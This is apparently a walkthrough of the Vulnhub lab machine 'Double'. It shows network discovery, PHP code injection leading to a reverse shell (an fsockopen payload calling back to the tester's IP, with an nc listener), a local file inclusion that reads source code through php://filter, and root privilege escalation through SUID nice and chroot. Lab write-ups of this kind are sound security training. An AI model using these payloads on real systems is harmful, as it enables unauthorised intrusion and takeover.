Vulnhub Double Walkthrough – Writeup
Double is an easy machine from Vulnhub by foxlox. I tested the machine in VirtualBox. Here, I won’t be explaining simple steps like listing files, viewing a file, editing a file, etc. “Vulnhub Double Walkthrough – Writeup”
Link to the machine: https://www.vulnhub.com/entry/double-1,632/
Lunchbreaker Walkthrough – Vulnhub – Writeup
Identify the target
As usual, I identified the IP address of the target machine.
sudo netdiscover -i eth0 -r 10.0.2.0/24
My IP address is 10.0.2.15 and that of the target is 10.0.2.61.
Scan open ports
Next, I scanned the open ports on the target machine. Doing so will give us an idea of the exposed services on the target machine.
nmap -v -T4 -sC -sV -p- -oN nmap.log 10.0.2.61
Enumerate web server
I checked the webserver at first.
The default page contained two links. Here, the TEST redirects to port 8080. Likewise, the Production link gave me the following page.
Looking at the inputs, it is asking the command and a code. So, I used the arbitrary code (9001) and a valid Linux command ‘id’.
However, it didn’t give me any command execution. But we see some results here. For example, we have now a new GET parameter “out”. Similarly, we see the date and time, and the IP address of my machine. So, we can guess that some variables have been used. Therefore, I tried executing some PHP code.
From the screenshot above, it confirmed that we can execute PHP commands. So, I used the following payload inside the PHP syntax. to get the reverse shell. Before this, I listened on port 9001 for the reverse shell.
nc -nlvp 9001$sock=fsockopen("10.0.2.15",9001);exec("bash <&3 >&3 2>&3");
Finally, I got the shell. Next, I improved the shell using the following link.
Upgrade to an intelligent reverse shell
Bonus: Local File Inclusion
As I told you earlier, there is a new GET parameter “out”. Interestingly, the parameter allowed local file inclusion.
So, we can check the techniques from the following reference.
https://book.hacktricks.xyz/pentesting-web/file-inclusion
Only the technique to read the source code worked. This is because the user www-data didn’t have access to do log poisoning. Similarly, some plugins aren’t enabled.
php://filter/convert.base64-encode/resource=sendcommand.php
After decoding the code, we see that the command isn’t validated and we could execute remote commands as we did earlier.
Privilege Escalation
Finally, it came to the part to escalate privileges. There were two users ppp and fox. However, I couldn’t find any way to escalate to any of the users. Interestingly, when I looked at the SUID binaries, there were two binaries that could give me root access.
find / -perm -4000 -exec ls -al {} \; 2>/dev/null
Using nice: https://gtfobins.github.io/gtfobins/nice/#suid
nice bash -p
Using chroot: https://gtfobins.github.io/gtfobins/chroot/#suid
chroot / bash -p
I guess this explains the name of the machine. Lastly, I got both flags.
